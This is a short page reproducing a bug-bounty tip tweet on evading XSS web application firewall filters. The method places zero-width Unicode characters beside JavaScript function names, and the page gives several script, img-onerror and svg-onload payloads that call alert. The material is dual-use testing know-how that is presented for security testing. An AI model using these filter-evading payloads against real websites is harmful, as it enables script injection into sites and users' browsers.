A tip for bypassing XSS WAF protection by using invisible separators before or after function names. Payload examples include using zero-width characters like \\uFEFF, \\u200B, \\u200C, \\u200D, \\u2060, \\uFEFF, and \\u180E. These characters can help evade detection by some WAFs. It's important for security professionals to be aware of these techniques to test the effectiveness of WAF protections.
Bug Bounty Tip
Bypass XSS WAF protection using invisible separators before or after function name<script>alertuFEFF('(1)')</script>
<img/src/onerror= alert(1)>
<svg/onload=alert⁠(1)>
<img/src/onerror=a​lert(1)>
<script>alert (1)</script> pic.twitter.com/bPmTBw7yXn
— ./Mr-Dark (@Mr_Dark55) June 26, 2024